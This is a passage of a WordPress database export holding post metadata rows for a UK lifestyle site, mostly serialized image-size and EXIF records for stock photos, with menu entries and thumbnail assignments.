G7\";s:7:\"caption\";s:46:\"Somewhere between the sacred silence and sleep\";s:17:\"created_timestamp\";s:10:\"1244886973\";s:9:\"copyright\";s:75:\"www.freeimages.co.uk attribution required for free use see site for details\";s:12:\"focal_length\";s:3:\"7.4\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:12:\"Coral Plates\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:7:{i:0;s:10:\"underwater\";i:1;s:5:\"coral\";i:2;s:6:\"corals\";i:3;s:4:\"reef\";i:4;s:9:\"australia\";i:5;s:10:\"queensland\";i:6;s:18:\"great barrier reef\";}}}'),(339,138,'_wp_attached_file','2017/10/corals_and_reef_fish2735.jpg'),(340,138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1875;s:4:\"file\";s:36:\"2017/10/corals_and_reef_fish2735.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"corals_and_reef_fish2735-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"corals_and_reef_fish2735-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"corals_and_reef_fish2735-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"corals_and_reef_fish2735-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:37:\"corals_and_reef_fish2735-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:36:\"corals_and_reef_fish2735-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:36:\"corals_and_reef_fish2735-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:36:\"corals_and_reef_fish2735-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:35:\"corals_and_reef_fish2735-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:18:\"Canon PowerShot G7\";s:7:\"caption\";s:44:\"an assortment of corals and yellow reef fish\";s:17:\"created_timestamp\";s:10:\"1244735493\";s:9:\"copyright\";s:75:\"www.freeimages.co.uk attribution required for free use see site for details\";s:12:\"focal_length\";s:3:\"7.4\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:9:\"Reef Fish\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:13:{i:0;s:8:\"swimming\";i:1;s:5:\"water\";i:2;s:5:\"coral\";i:3;s:6:\"corals\";i:4;s:4:\"swim\";i:5;s:4:\"fins\";i:6;s:8:\"flippers\";i:7;s:5:\"shell\";i:8;s:4:\"reef\";i:9;s:4:\"fish\";i:10;s:12:\"barrier reef\";i:11;s:9:\"australia\";i:12;s:10:\"queensland\";}}}'),(341,139,'_wp_attached_file','2017/10/corporate_office_block.jpg'),(342,139,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3000;s:6:\"height\";i:1996;s:4:\"file\";s:34:\"2017/10/corporate_office_block.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"corporate_office_block-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"corporate_office_block-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"corporate_office_block-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"corporate_office_block-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:35:\"corporate_office_block-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:34:\"corporate_office_block-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:34:\"corporate_office_block-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:34:\"corporate_office_block-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:33:\"corporate_office_block-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:109:\"Tilted angle view of modern corporate office block skyscraper with multiple windows against a cloudy blue sky\";s:17:\"created_timestamp\";s:10:\"1302612327\";s:9:\"copyright\";s:62:\"www.freeimages.co.uk attribution license, see site for details\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:22:\"Corporate office block\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:14:{i:0;s:8:\"business\";i:1;s:4:\"blue\";i:2;s:8:\"building\";i:3;s:10:\"background\";i:4;s:9:\"executive\";i:5;s:9:\"corporate\";i:6;s:5:\"block\";i:7;s:4:\"high\";i:8;s:6:\"office\";i:9;s:4:\"huge\";i:10;s:9:\"important\";i:11;s:10:\"increasing\";i:12;s:7:\"improve\";i:13;s:14:\"establishments\";}}}'),(343,140,'_wp_attached_file','2017/10/Cyphastrea_3385.jpg'),(344,140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1674;s:4:\"file\";s:27:\"2017/10/Cyphastrea_3385.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Cyphastrea_3385-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Cyphastrea_3385-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Cyphastrea_3385-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Cyphastrea_3385-1024x686.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:686;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:28:\"Cyphastrea_3385-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:27:\"Cyphastrea_3385-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:27:\"Cyphastrea_3385-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:27:\"Cyphastrea_3385-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:26:\"Cyphastrea_3385-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D200\";s:7:\"caption\";s:55:\"Coral of the Faviidae family, Genus Cyphastrea agassizi\";s:17:\"created_timestamp\";s:10:\"1215066634\";s:9:\"copyright\";s:75:\"www.freeimages.co.uk attribution required for free use see site for details\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:16:\"Hard Coral Macro\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:13:{i:0;s:8:\"Faviidae\";i:1;s:5:\"coral\";i:2;s:10:\"underwater\";i:3;s:4:\"reef\";i:4;s:6:\"corals\";i:5;s:7:\"sealife\";i:6;s:6:\"nature\";i:7;s:12:\"barrier reef\";i:8;s:10:\"queensland\";i:9;s:9:\"australia\";i:10;s:4:\"hard\";i:11;s:5:\"macro\";i:12;s:8:\"close-up\";}}}'),(345,141,'_wp_attached_file','2017/10/daffodils.jpg'),(346,141,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2500;s:6:\"height\";i:1664;s:4:\"file\";s:21:\"2017/10/daffodils.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"daffodils-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"daffodils-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"daffodils-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"daffodils-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:22:\"daffodils-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:21:\"daffodils-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:21:\"daffodils-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:21:\"daffodils-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:20:\"daffodils-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:83:\"Background of flowering yellow daffodils in spring amongst green grass in woodland.\";s:17:\"created_timestamp\";s:10:\"1199494611\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:3:\"145\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:26:\"Flowering Yellow Daffodils\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:18:{i:0;s:4:\"wood\";i:1;s:5:\"green\";i:2;s:8:\"woodland\";i:3;s:6:\"yellow\";i:4;s:8:\"cheerful\";i:5;s:4:\"wild\";i:6;s:8:\"seasonal\";i:7;s:6:\"spring\";i:8;s:5:\"grass\";i:9;s:6:\"plants\";i:10;s:7:\"growing\";i:11;s:6:\"floral\";i:12;s:7:\"flowers\";i:13;s:8:\"blooming\";i:14;s:10:\"ornamental\";i:15;s:6:\"blooms\";i:16;s:9:\"narcissus\";i:17;s:9:\"daffodils\";}}}'),(349,57,'_adinserter_block_exceptions',''),(350,57,'_hitmag_layout_meta','th-default-layout'),(351,45,'_thumbnail_id','136'),(352,12,'_thumbnail_id','130'),(353,38,'_thumbnail_id','167'),(354,30,'_thumbnail_id','141'),(355,27,'_thumbnail_id','112'),(356,29,'_thumbnail_id','114'),(357,24,'_thumbnail_id','131'),(358,32,'_thumbnail_id','121'),(359,34,'_thumbnail_id','139'),(360,35,'_thumbnail_id','121'),(361,50,'_thumbnail_id','111'),(362,36,'_thumbnail_id','119'),(363,46,'_thumbnail_id','120'),(364,40,'_thumbnail_id','116'),(365,14,'_thumbnail_id','124'),(366,41,'_thumbnail_id','136'),(367,8,'_thumbnail_id','123'),(368,47,'_thumbnail_id','114'),(369,48,'_thumbnail_id','132'),(370,49,'_thumbnail_id','133'),(371,6,'_thumbnail_id','129'),(372,10,'_thumbnail_id','131'),(373,51,'_thumbnail_id','133'),(374,52,'_thumbnail_id','138'),(375,53,'_thumbnail_id','131'),(376,54,'_thumbnail_id','138'),(377,56,'_thumbnail_id','141'),(378,55,'_thumbnail_id','138'),(379,44,'_thumbnail_id','126'),(380,57,'_thumbnail_id','122'),(381,58,'_thumbnail_id','110'),(382,59,'_thumbnail_id','120'),(383,60,'_thumbnail_id','110'),(384,39,'_thumbnail_id','135'),(385,42,'_thumbnail_id','120'),(386,43,'_thumbnail_id','112'),(387,33,'_thumbnail_id','139'),(388,31,'_thumbnail_id','110'),(389,28,'_thumbnail_id','123'),(390,37,'_thumbnail_id','137'),(399,24,'_edit_last','1'),(400,24,'_wp_page_template','default'),(401,24,'_adinserter_block_exceptions',''),(402,24,'_hitmag_layout_meta','th-default-layout'),(403,151,'_menu_item_type','custom'),(404,151,'_menu_item_menu_item_parent','0'),(405,151,'_menu_item_object_id','151'),(406,151,'_menu_item_object','custom'),(407,151,'_menu_item_target',''),(408,151,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(409,151,'_menu_item_xfn',''),(410,151,'_menu_item_url','http://www.dailyjolly.co.uk'),(411,152,'_menu_item_type','post_type'),(412,152,'_menu_item_menu_item_parent','0'),(413,152,'_menu_item_object_id','24'),(414,152,'_menu_item_object','page'),(415,152,'_menu_item_target',''),(416,152,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(417,152,'_menu_item_xfn',''),(418,152,'_menu_item_url',''),(419,153,'_menu_item_type','post_type'),(420,153,'_menu_item_menu_item_parent','0'),(421,153,'_menu_item_object_id','30'),(422,153,'_menu_item_object','post'),(423,153,'_menu_item_target',''),(424,153,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(425,153,'_menu_item_xfn',''),(426,153,'_menu_item_url',''),(427,154,'_menu_item_type','post_type'),(428,154,'_menu_item_menu_item_parent','0'),(429,154,'_menu_item_object_id','28'),(430,154,'_menu_item_object','post'),(431,154,'_menu_item_target',''),(432,154,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(433,154,'_menu_item_xfn',''),(434,154,'_menu_item_url',''),(435,155,'_menu_item_type','post_type'),(436,155,'_menu_item_menu_item_parent','154'),(437,155,'_menu_item_object_id','33'),(438,155,'_menu_item_object','post'),(439,155,'_menu_item_target',''),(440,155,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(441,155,'_menu_item_xfn',''),(442,155,'_menu_item_url',''),(443,156,'_menu_item_type','post_type'),(444,156,'_menu_item_menu_item_parent','0'),(445,156,'_menu_item_object_id','38'),(446,156,'_menu_item_object','post'),(447,156,'_menu_item_target',''),(448,156,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(449,156,'_menu_item_xfn',''),(450,156,'_menu_item_url',''),(451,157,'_menu_item_type','post_type'),(452,157,'_menu_item_menu_item_parent','0'),(453,157,'_menu_item_object_id','36'),(454,157,'_menu_item_object','post'),(455,157,'_menu_item_target',''),(456,157,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(457,157,'_menu_item_xfn',''),(458,157,'_menu_item_url',''),(461,159,'_menu_item_type','post_type'),(462,159,'_menu_item_menu_item_parent','0'),(463,159,'_menu_item_object_id','42'),(464,159,'_menu_item_object','post'),(465,159,'_menu_item_target',''),(466,159,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(467,159,'_menu_item_xfn',''),(468,159,'_menu_item_url',''),(477,164,'_edit_last','1'),(478,164,'_edit_lock','1520344939:1'),(479,164,'_wp_page_template','default'),(480,164,'_adinserter_block_exceptions',''),(481,164,'_hitmag_layout_meta','th-default-layout'),(482,167,'_wp_attached_file','2017/10/summer-makeup.jpg'),(483,167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/summer-makeup.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"summer-makeup-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"summer-makeup-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"summer-makeup-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:25:\"summer-makeup-960x450.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:25:\"summer-makeup-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:25:\"summer-makeup-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:25:\"summer-makeup-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:24:\"summer-makeup-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(484,167,'_wp_attachment_image_alt','Summer makeup tips'),(485,169,'_wp_attached_file','2017/10/eye-look.jpg'),(486,169,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:20:\"2017/10/eye-look.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"eye-look-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"eye-look-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"eye-look-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:20:\"eye-look-960x450.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:20:\"eye-look-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:20:\"eye-look-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:20:\"eye-look-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:19:\"eye-look-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(487,169,'_wp_attachment_image_alt','Semi permanent eyeliner'),(488,172,'_menu_item_type','post_type'),(489,172,'_menu_item_menu_item_parent','0'),(490,172,'_menu_item_object_id','164'),(491,172,'_menu_item_object','page'),(492,172,'_menu_item_target',''),(493,172,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(494,172,'_menu_item_xfn',''),(495,172,'_menu_item_url',''),(504,24,'wpmdr_menu','1'),(505,31,'wpmdr_menu','1'),(506,178,'_edit_last','1'),(507,178,'_edit_lock','1510316215:1'),(508,178,'_wp_page_template','default'),(509,178,'_adinserter_block_exceptions',''),(510,178,'_hitmag_layout_meta','th-default-layout'),(511,178,'wpmdr_menu','1'),(512,180,'_wp_attached_file','2017/11/keys.jpg'),(513,180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:16:\"2017/11/keys.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"keys-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"keys-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"keys-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:16:\"keys-960x450.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:16:\"keys-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:16:\"keys-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:16:\"keys-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:15:\"keys-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NX300M\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(514,180,'_wp_attachment_image_alt','Buy to let'),(515,183,'_menu_item_type','post_type'),(516,183,'_menu_item_menu_item_parent','0'),(517,183,'_menu_item_object_id','178'),(518,183,'_menu_item_object','page'),(519,183,'_menu_item_target',''),(520,183,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(521,183,'_menu_item_xfn',''),(522,183,'_menu_item_url',''),(525,50,'wpmdr_menu','1'),(526,60,'wpmdr_menu','1'),(527,35,'wpmdr_menu','1'),(528,47,'wpmdr_menu','1'),(529,34,'wpmdr_menu','1'),(530,28,'wpmdr_menu','1'),(531,33,'wpmdr_menu','1'),(532,52,'wpmdr_menu','1'),(533,14,'wpmdr_menu','1'),(534,43,'wpmdr_menu','1'),(535,38,'wpmdr_menu','1'),(536,41,'wpmdr_menu','1'),(537,55,'wpmdr_menu','1'),(538,37,'wpmdr_menu','1'),(539,36,'wpmdr_menu','1'),(540,164,'wpmdr_menu','1'),(541,40,'wpmdr_menu','1'),(542,57,'wpmdr_menu','1'),(543,58,'wpmdr_menu','1'),(544,48,'wpmdr_menu','1'),(545,32,'wpmdr_menu','1'),(546,46,'wpmdr_menu','1'),(547,49,'wpmdr_menu','1'),(548,45,'wpmdr_menu','1'),(549,44,'wpmdr_menu','1'),(550,54,'wpmdr_menu','1'),(551,59,'wpmdr_menu','1'),(552,51,'wpmdr_menu','1'),(553,6,'wpmdr_menu','1'),(554,56,'wpmdr_menu','1'),(555,29,'wpmdr_menu','1'),(556,53,'wpmdr_menu','1'),(557,30,'wpmdr_menu','1'),(558,42,'wpmdr_menu','1'),(559,27,'wpmdr_menu','1'),(560,39,'wpmdr_menu','1'),(561,8,'wpmdr_menu','1'),(562,10,'wpmdr_menu','1'),(563,12,'wpmdr_menu','1'),(564,193,'_edit_last','1'),(565,193,'_edit_lock','1539946645:1'),(566,193,'_wp_page_template','default'),(567,193,'_adinserter_block_exceptions',''),(568,193,'_hitmag_layout_meta','th-default-layout'),(569,193,'wpmdr_menu','1'),(570,195,'_wp_attached_file','2018/10/team-spirit-2447163_960_720.jpg'),(571,195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:889;s:6:\"height\";i:720;s:4:\"file\";s:39:\"2018/10/team-spirit-2447163_960_720.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-300x243.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-768x622.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:622;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-889x450.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:39:\"team-spirit-2447163_960_720-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";